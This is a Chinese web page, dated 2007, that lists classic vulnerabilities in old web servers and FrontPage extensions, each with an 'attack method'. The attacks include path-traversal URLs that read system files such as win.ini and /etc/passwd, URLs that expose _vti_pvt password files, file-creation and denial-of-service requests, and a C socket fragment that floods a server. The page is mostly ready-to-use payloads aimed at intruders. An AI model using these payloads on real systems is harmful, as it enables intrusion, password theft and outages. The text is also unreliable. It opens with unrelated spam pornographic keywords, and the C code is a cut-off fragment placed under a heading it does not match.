欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一些收集到的經(jīng)典漏洞詳解第1/2頁

 更新時(shí)間:2007年01月16日 00:00:00   作者:  
☆carbo.dll☆  
iCat Carbo服務(wù)器一個(gè)網(wǎng)絡(luò)購(gòu)物程序,它被 PC雜評(píng)為最好的網(wǎng)絡(luò)購(gòu)物軟件.安全專家Mikael Johansson發(fā)現(xiàn) iCat Carbo服務(wù)器版本 3.0.0.中存在一個(gè)漏洞, 

這個(gè)漏洞讓我們每個(gè)人查看系統(tǒng)中的任何文件在(除文件之外和一些特殊字符).  
攻擊方法:  

提交這樣的http請(qǐng)求 :  
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog  

http會(huì)做如下回應(yīng):  
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]  

Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'  

查看win.ini文件: c:\winnt\win.ini:  

http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog  
___________________________________________________________________________  
☆uploader.exe☆  

如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件。  
攻擊方法: http://host/cgi-win/uploader.exe  
會(huì)帶你到上傳頁面,剩下的事就不用我告訴你了把?:)  
___________________________________________________________________________  
☆search97.vts☆  

這個(gè)文件將能使入侵者任意的讀取你系統(tǒng)中啟動(dòng)httpd用戶能讀取的文件。  
攻擊方法: http://www.xxx.com/search97.vts  
?HLNavigate=On&querytext=dcm  
&ServerKey=Primary  
&ResultTemplate=../../../../../../../etc/passwd  
&ResultStyle=simple  
&ResultCount=20  
&collection=books  
___________________________________________________________________________  
☆newdsn.exe☆  

個(gè)存在于/scripts/tools目錄下的newdsn.exe文件允許任何一個(gè)用戶在web根目錄下創(chuàng)建任何文件。另外,在某些特定條件下,
利用newdsn.exe可能使IIS遭受拒絕服務(wù)攻擊,如果攻擊成功,將導(dǎo)致IIS停止響應(yīng)連接請(qǐng)求。  
攻擊方法:  
1. 創(chuàng)建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=  
2. D.o.s攻擊:提交下列連接請(qǐng)求:  
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  

如果IIS是有問題的版本,瀏覽器將不會(huì)顯示任何信息。當(dāng)下列兩種情況中的任意一種發(fā)生時(shí),都會(huì)導(dǎo)致拒絕服務(wù):  

- 重新啟動(dòng)WWW服務(wù)時(shí): 這將導(dǎo)致IIS掛起。不能重新啟動(dòng)WWW服務(wù),總是顯示"端口已經(jīng)被占用"的錯(cuò)誤信息。  
- 停止WWW服務(wù): IIS將會(huì)停止 。但是IIS的數(shù)據(jù)庫部分并沒有死掉,仍然會(huì)響應(yīng)80端口發(fā)來的請(qǐng)求,因此, 

如果再次提交一個(gè)請(qǐng)求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  
IIS會(huì)產(chǎn)生保護(hù)性錯(cuò)誤。  
___________________________________________________________________________  
☆service.pwd☆  

http://www.hostname.com/_vti_pvt/service.pwd可讀,將暴露用戶密碼信息.  
攻擊方法:  
訪問http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密碼文件,如果我們粗心的網(wǎng)管沒有設(shè)置權(quán)限的話,那瀏覽器就會(huì)顯示出對(duì)方的密碼文件。  

___________________________________________________________________________  
☆users.pwd☆  

UNix系統(tǒng)的http://www.hostname.com/_vti_pvt/users.pwd可讀,將暴露用戶密碼信息。  
攻擊方法:  
訪問http://www.hostname.com/_vti_pvt/users.pwd。  

___________________________________________________________________________  
☆authors.pwd☆  

UNix系統(tǒng)的http://www.hostname.com/_vti_pvt/authors.pwd可讀,將暴露用戶密碼信息。  
攻擊方法:  
訪問http://www.hostname.com/_vti_pvt/authors.pwd。  
___________________________________________________________________________  
☆administrators.pwd☆  

UNix系統(tǒng)的http://www.hostname.com/_vti_pvt/administrators.pwd可讀,將暴露用戶密碼信息。  
攻擊方法:  
訪問http://www.hostname.com/_vti_pvt/administrators.pwd。  

___________________________________________________________________________  
☆shtml.dll☆  

在Frontpage Extention Server/Windows2000 Server上輸入一個(gè)不存在的文件將可以得到web目錄的本地路徑信息.
 但是如果我們請(qǐng)求并非HTML、SHTML或者ASP后綴的文件,我們將會(huì)得到不同的信息. http://TrustedServer如果用戶點(diǎn)擊
上述指定的鏈接,腳本將通過HTTP請(qǐng)求從客戶端傳送給可信任的站點(diǎn),可信任站點(diǎn)然后將該腳本作為錯(cuò)誤信息的一部分返回給客
戶端??蛻舳嗽谑盏桨撃_本的出錯(cuò)頁面時(shí),將執(zhí)行該腳本,并將賦予來自可信任站點(diǎn)的內(nèi)容的所有權(quán)力賦予該腳本。另外,
shtml.dll對(duì)較長(zhǎng)的帶html后綴的文件名都會(huì)進(jìn)行識(shí)別和處理,利用這一點(diǎn),可以對(duì)IIS服務(wù)器執(zhí)行DOS攻擊,以下這個(gè)程序,
能使目標(biāo)服務(wù)器的CPU占用率達(dá)到 100%,并且耗用所有的應(yīng)用程序日志空間。系統(tǒng)在數(shù)分鐘內(nèi)會(huì)報(bào)告應(yīng)用程序日志已滿。  
攻擊方法:  
1. 暴露路徑:http://www.victim.com/_vti_bin/shtml.dll/something.html  
這樣將返回以下信息:  
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.  
2. 可信任站點(diǎn)執(zhí)行腳本:使用如下格式的URL:  
serv_addr.sin_family =AF_INET;  
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");  
serv_addr.sin_port = htons(80);  

if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)  
{  
printf("Create Socket faild \n");  
return ;  
}  

if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)  
{  
printf("Connect faild \n");;  
}  
else  
{  
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );  
for (lDo = 0 ;lDo < 7000;lDo ++)  
{  
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;  
if (lLen < 0 )  
{  
printf("Send faild \n");  
return;  
}  
}  
lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;  
//recv(sockfd,buffer,2000,0);  
//printf(buffer);  
//printf("\n");  
}  
closesocket(sockfd);  
}  


___________________________________________________________________________  
☆shtml.exe☆  

微軟的 FrontPage Server Extensions存在一個(gè)遠(yuǎn)程拒絕服務(wù)漏洞,可能遠(yuǎn)程關(guān)閉一個(gè)web站點(diǎn)上的所有FrontPage操作。
通過提交一個(gè)包含DOS設(shè)備名的鏈接, FrontPage Server Extensions就會(huì)掛起,不再響應(yīng)后續(xù)的請(qǐng)求。為了恢復(fù)正常工作,必須重新啟動(dòng)IIS或者重新啟動(dòng)機(jī)器。  
攻擊方法:  
提交這樣的鏈接,都可能使FrontPage Server Extensions停止響應(yīng): http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/
prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe
/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_
vti_bin/shtml.exe/com1 .  
___________________________________________________________________________  
☆queryhit.htm☆  

如果queryhit.htm提出一個(gè)搜索頁面,那么你便可以搜索和觀看這些文件。  
攻擊方法:  
訪問http://www.victim.com/samples/search/queryhit.htm 如果是搜索頁面,然后在查找文件對(duì)話框里輸入以下字符串:
[#filename=*.pwd],如果屏幕上出現(xiàn)一長(zhǎng)串連接到以[.pwd]為擴(kuò)展名的密碼文件的話,那就是所需要的東東了。  
___________________________________________________________________________  
☆Dotdotdot☆  

vqServer及Sybase PowerDynamo網(wǎng)站服務(wù)器存在著一個(gè)老的攻擊漏洞,此攻擊是關(guān)于點(diǎn)點(diǎn)(..)的攻擊,這是由于在WINDOW
中允許連續(xù)的點(diǎn)被解釋為級(jí)連的目錄如'cd ...',解釋為'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允許遠(yuǎn)程攻擊
者繞過WEB安全系統(tǒng)橫貫到其他目錄。  
攻擊方法:  
假如CONFIG.SYS存在在根目錄下,就能讀文件。 http://example.com/...................../config.sys  
列出根目錄。 http://example.com/ /../../../../../../  
___________________________________________________________________________  
☆autoexec.bat☆  

現(xiàn)在很多web服務(wù)器上存在這個(gè)安全問題,例如Jana Webserver,URL Live 1.0 webserver等.惡意的用戶可能利用該漏洞來
退出HTTP root目錄,從而到達(dá)上層的目錄樹中.在URL中使用"../",攻擊者們可以獲得WEB SERVER有權(quán)讀取的任何文件.  
攻擊方法: :8080/../../../autoexec.bat 這樣將讀取畹統(tǒng)中的autoexec.bat文件  
這個(gè)漏洞的利用還取決于系統(tǒng)目錄的結(jié)構(gòu)而定.  
___________________________________________________________________________  
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆  

IIS4.0中包含一個(gè)有趣的特征就是允許遠(yuǎn)程用戶攻擊WEB服務(wù)器上的用戶帳號(hào),就是你的WEB服務(wù)器是通過NAT來轉(zhuǎn)換地址的,
還可以被攻擊。每個(gè)IIS4.0安裝的時(shí)候建立一個(gè)虛擬目錄/iisadmpwd,這個(gè)目錄包含多個(gè).htr文件,匿名用戶允許訪問這些文件,
這些文件剛好沒有規(guī)定只限制在loopback addr(127.0.0.1),請(qǐng)求這些文件就跳出對(duì)話框讓你通過WEB來修改用戶的帳號(hào)和密碼。
這個(gè)目錄物理映射在下面的目錄下:  
c:\winnt\system32\inetsrv\iisadmpwd  
攻擊方法:  
訪問:http://example.com/iisadmpwd/*.htr的頁面,并利用工具對(duì)其進(jìn)行窮舉。  

相關(guān)文章

最新評(píng)論